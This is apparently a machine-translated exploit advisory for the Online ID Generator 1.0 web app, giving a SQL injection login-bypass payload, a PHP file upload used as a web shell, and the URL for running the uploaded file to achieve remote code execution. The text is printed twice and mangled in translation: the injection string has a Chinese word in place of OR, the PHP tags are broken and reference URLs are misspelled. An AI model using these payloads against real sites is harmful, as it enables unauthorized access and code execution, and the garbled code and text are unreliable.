## title:在线ID Generator 1.0-远程代码执行(RCE)
##作者: nu11secur1ty
## Date: 08/31/2023
## vendor:
## Software: https://www.sourcecodester.com/sites/default/files/files/download/oretnom23/id_generator_0.zip
##参考: https://portswigger.net/web-security/sql-invoction
##参考: https://portswigger.net/web-security/file-upload
##参考: https://portswigger.net/web-securit...code-execution-ececution-via-web-shell-upload
状态:高临界脆弱性
[+]旁路登录SQLI:
#在登录表格中,用于用户:
``MySQL
nu11secur1ty'或1=1#
````````
[+]外壳上传exploit:
##用于系统徽标:
````PHP
php
phpinfo();
?
````````
[+] RCE利用
##从远程浏览器执行:
``````urlhttp://localhost/id_generator/uploads/1693471560_info.php
````````
##复制:
[HREF](https://github.com/nu11secur1ty/cve.../oretnom23/2023/2023/online-id-generator-1.0)
##证明和Exploit:
[HREF](https://www.nu11secur1ty.com/2023/08/online-id-generator-10-sqli-bypass.html)
##时间花费:
00:10:00
##作者: nu11secur1ty
## Date: 08/31/2023
## vendor:
##参考: https://portswigger.net/web-security/sql-invoction
##参考: https://portswigger.net/web-security/file-upload
##参考: https://portswigger.net/web-securit...code-execution-ececution-via-web-shell-upload
状态:高临界脆弱性
[+]旁路登录SQLI:
#在登录表格中,用于用户:
``MySQL
nu11secur1ty'或1=1#
````````
[+]外壳上传exploit:
##用于系统徽标:
````PHP
php
phpinfo();
?
````````
[+] RCE利用
##从远程浏览器执行:
``````urlhttp://localhost/id_generator/uploads/1693471560_info.php
````````
##复制:
[HREF](https://github.com/nu11secur1ty/cve.../oretnom23/2023/2023/online-id-generator-1.0)
##证明和Exploit:
[HREF](https://www.nu11secur1ty.com/2023/08/online-id-generator-10-sqli-bypass.html)
##时间花费:
00:10:00
